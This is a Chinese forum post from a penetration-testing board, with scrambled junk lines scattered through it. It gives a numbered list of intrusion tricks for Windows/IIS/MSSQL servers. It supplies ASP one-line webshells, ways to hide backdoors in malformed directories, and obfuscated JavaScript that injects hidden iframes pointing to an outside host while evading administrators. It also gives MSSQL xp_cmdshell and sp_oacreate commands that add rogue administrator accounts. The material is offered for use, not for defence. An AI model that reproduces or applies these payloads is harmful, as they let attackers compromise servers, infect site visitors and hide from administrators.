; L. W$ B& T2 n# ^
51、log备份时的一句话木马:
3 _9 [/ g: s6 I: U
a).<%%25Execute(request("go"))%%25>
/ S O: R, X; G
b).<%Execute(request("go"))%>
/ W( P; u0 w _' P2 @5 o
c).%><%execute request("go")%><%
/ s# G. b" p4 c- X3 [; X. X
d).<script language=VBScript runat=server>execute request("sb")</Script>
3 O# V6 i% B; v
e).<%25Execute(request("l"))%25>
/ r5 Q* O! `9 b& P) d0 B; Q
f).<%if request("cmd")<>"" then execute request("pass")%>
$ @5 H1 r) I' V0 V
% \4 T% y7 S! [0 s% j; y! X. [0 \
52、at "12:17" /interactive cmd
6 l) c5 `) M; p* j9 ~0 W' y
执行后可以用AT命令查看新加的任务
3 W/ L- b9 r# t- P7 V
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
+ p$ I) j& w2 W2 @+ X' d7 w6 g$ E
( P+ m7 P; S8 g
53、隐藏ASP后门的两种方法
5 D3 ^! N- o& D8 n0 F( O
1、建立非标准目录:mkdir images..\
- K( ~ J- D: \% f o
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
0 t1 N( l3 W2 r" F% r2 \
通过web访问ASP木马:http://ip/images../news.asp?action=login
5 _% a3 [: Z {
如何删除非标准目录:rmdir images..\ /s
' {! u+ M. B8 ?& B- H9 p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 K/ Z& Y. H0 a' A) t
mkdir programme.asp
* T: B6 w% K% Y5 G' B' K
新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 C' }% W- l6 p/ ]( Y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
# u/ V; a% x/ S
attrib +H +S programme.asp
' g" r% v, C0 y: T3 Q
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
; x$ V) X7 h8 c, i7 _7 P+ x
3 s* a& d" k+ H% n, z$ ^- R8 O0 R
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. l, X# K4 t3 V) {/ B8 Z/ o
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
" j |& H1 G% N' G! {5 K; l
9 x0 o& l% S) m/ n3 ~0 S0 G' r1 ?
55、JS隐蔽挂马
3 g4 J& n0 }% {0 F
1.
+ b3 F/ F* V+ z. x9 F5 c J
var tr4c3="<iframe src=ht";
! P+ u9 H$ k# ? E- N% T" }
tr4c3 = tr4c3+"tp:/";
+ F+ c% v5 R8 T+ S; Q
tr4c3 = tr4c3+"/ww";
8 d* ^0 q" S- a! w% [0 T0 o
tr4c3 = tr4c3+"w.tr4";
7 v' m+ R) @5 h
tr4c3 = tr4c3+"c3.com/inc/m";
5 g3 I; y5 ?7 K3 E* k2 l" A$ p
tr4c3 = tr4c3+"m.htm style="display:none"></i";
3 h+ V0 I3 ]; S8 l' {3 B
tr4c3 =tr4c3+"frame>'";
3 D9 K3 q( H# S( Y: ?/ I/ X' I! B
document.write(tr4c3);
2 H; ?4 z/ ]: {
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
( P* p. G9 `" _% }# r* o2 T
) O- p: C* v2 ^* A" i+ P* Y" m
2.
2 a/ B* L1 h3 Y
转换进制,然后用EVAL执行。如
, K1 S( h w% j' C/ M
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* V% T# W( E" }
不过这个有点显眼。
8 ~' Z- l& |' s) T8 U, k
3.
0 y# w4 U$ ?( f! b- x0 T
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
) V" x# a1 `0 o+ t
最后一点,别忘了把文件的时间也修改下。
' n5 P" ?1 F6 I! f9 j6 ~* i" x
, A- A/ V; i+ D* w1 m0 c
56.3389终端入侵常用DOS命令
# t0 _* N! c. f3 K8 k3 J
taskkill taskkill /PID 1248 /t
; z( i1 P( ?; }: f' ]
: h9 y; I% L$ W
tasklist 查进程
/ c' u0 g: R- M! W, v3 B
# t/ v" x T) S. x; T7 Z6 r, s* R: G
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( ]5 b/ Z% P; x) w2 U: a
iisreset /reboot
; s0 C, e7 M5 C' A
tsshutdn /reboot /delay:1 重起服务器
: U* G+ u& w; g
. T6 S1 \: j! p4 {
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
* w; ?# v6 x. z( N2 y2 V' n& ?
9 ~6 H% h% D8 L* B9 K% N3 B
query user 查看当前终端用户在线情况
: T' o6 e( F! d& j: Y0 F0 b
3 m6 S# ?! N ?# p, { T1 q
要显示有关所有会话使用的进程的信息,请键入:query process *
% M6 [% c! D) {$ t" a* }2 `
2 W! p' A8 x1 V" Q% {8 }' |) u/ v
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
5 U7 g0 D* y+ B W6 }7 Z
* S g1 T- f4 {4 S' P) f
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 H, N8 p% N5 w
& J9 i3 G3 x8 n+ {$ i
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
6 b# q& Z) w2 k9 M+ u# L \
* A c' l' m9 H5 l Y- G4 u( P
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% p) X3 n/ |: B3 i3 i- b
" t/ s0 a3 z) c
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. o( X" n' a* I
8 R& h0 \( R+ m
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
' e+ o$ D8 U8 j7 E2 w0 Q
# P; `6 P& c9 V) ^9 k- P( M6 Y
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
- A. O( q0 \8 h$ p# w9 P/ Q
3 J+ z2 D( d/ |! y% R5 f
56、在地址栏或按Ctrl+O,输入:
, O' e' ^, L3 I$ G# F
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) j9 i2 F2 g+ W) M% V
: h7 ^8 e0 B' B5 W$ w. Z
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
b- @2 T. O6 J7 O" q B
( E7 [( g: \- }9 O& A
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
+ z7 U/ a) q4 |5 k; x
用net localgroup administrators是可以看到管理组下,加了$的用户的。
) s7 s; P/ E1 `$ z) F- e7 F' q, d! `
: K; k) [. [5 F- ^. I6 [; P
58、 sa弱口令相关命令
& m* f" t* R- ~
3 A7 A8 _- {% u; M5 ~
一.更改sa口令方法:
1 p' O2 e2 R8 \7 g U; r& S
用sql综合利用工具连接后,执行命令:
2 y- r# H8 u- Q; _7 _
exec sp_password NULL,'20001001','sa'
4 k* I6 n6 I4 y6 M; H4 A( T
(提示:慎用!)
4 H, f: N, h) D. ~
( O' S( c$ m. C
二.简单修补sa弱口令.
( d* u u3 F! w5 L* i% h
' j" A2 s2 w# U) ?3 r8 Q( y
方法1:查询分离器连接后执行:
9 \/ g" }0 {4 [5 R- g6 V; ~
if exists (select * from
I) c: U5 p5 k2 I; i
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
6 L7 H+ M' Y( i- H2 Q) \, H- f
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
+ |7 [- [- b& _3 x4 u3 o" I
0 ~- |2 |# ~; @% B
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
* P' U9 O# m& `! O- m$ F
' r( h2 R0 u* R3 V. [5 x/ ~, x& F
GO
6 i0 O) e, M- u! W8 o9 `0 _, U
/ `' U) Y% n6 J) Z; j! r0 t
然后按F5键命令执行完毕
6 x0 p. N9 G b! O
( C1 T* d* }' ?: H7 Q
方法2:查询分离器连接后
2 N# U$ w7 D+ S7 F6 g+ W( |$ v
第一步执行:use master
3 Q$ `+ A% v! Y7 R* l, S9 r
第二步执行:sp_dropextendedproc 'xp_cmdshell'
v, t5 v2 \# }: G" M
然后按F5键命令执行完毕
( l5 R N' o3 E& p. K# S
! L3 r' v; `& H4 z8 G
& d& W! f" Q; X. v1 O! n; _
三.常见情况恢复执行xp_cmdshell.
' P. n: M ~! r- w1 X% L0 k; J" A8 q
' d. v+ g( L6 k/ }! H- e7 Y
) C9 J( i# F6 \% | s
1 未能找到存储过程'master..xpcmdshell'.
1 g4 h# o/ Y1 J! Z
恢复方法:查询分离器连接后,
" ^+ ?) p' e2 z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
' g/ ]1 Q7 ?4 g6 I# T B: u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" ?+ F) l* J9 t9 z0 j! A
然后按F5键命令执行完毕
) d: o6 W, j; E7 x1 v3 B
! F+ g/ Q ?, x& v6 W! |
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- O5 j1 R: ]4 w3 F; i/ B" ~2 F* J
恢复方法:查询分离器连接后,
1 U9 O8 B" B0 ~& l# q' C' Y7 X
第一步执行:sp_dropextendedproc "xp_cmdshell"
( t8 r% {" S7 h5 g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' Z2 b* I5 T% x- m; Q' K9 l
然后按F5键命令执行完毕
) Z% K2 ]1 u4 F% m, K1 e
0 B% b7 w, \" n! d) |
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
3 d: N9 F! G2 r2 }- i, w( m+ B
恢复方法:查询分离器连接后,
2 _/ h: h& F* [, C
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
+ x M& q& `+ P7 n5 r: f& P
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
2 q/ p. z6 ]! U2 X$ ~
然后按F5键命令执行完毕
. @8 h# p2 Q. ~+ ^
" ~8 `) P+ X$ p0 T3 D( ]7 J
四.终极方法.
& G* Q& J# `+ ], U, ~9 M' R+ a
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 L) z+ |# ]* {; b5 N N
查询分离器连接后,
/ D g$ U; x- V! u5 p
2000servser系统:
& ]" R4 r$ d- R8 t- F5 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
' u! }. ^ r" i
. d. G4 e& F+ @9 z4 d6 l8 D1 x+ E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( V+ d6 M7 s9 Q- p5 B
0 H+ y7 Y, q9 M7 e/ L. z. K& I# E+ A
xp或2003server系统:
1 [" X" m! H4 z! z$ ~' k0 s
6 ~2 U1 Q& j, k3 d6 z1 x* J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
5 v, ~* M7 r7 ^$ W& Y" D
& [4 \$ x( q4 a3 y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ M4 H8 ]; j/ g" H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2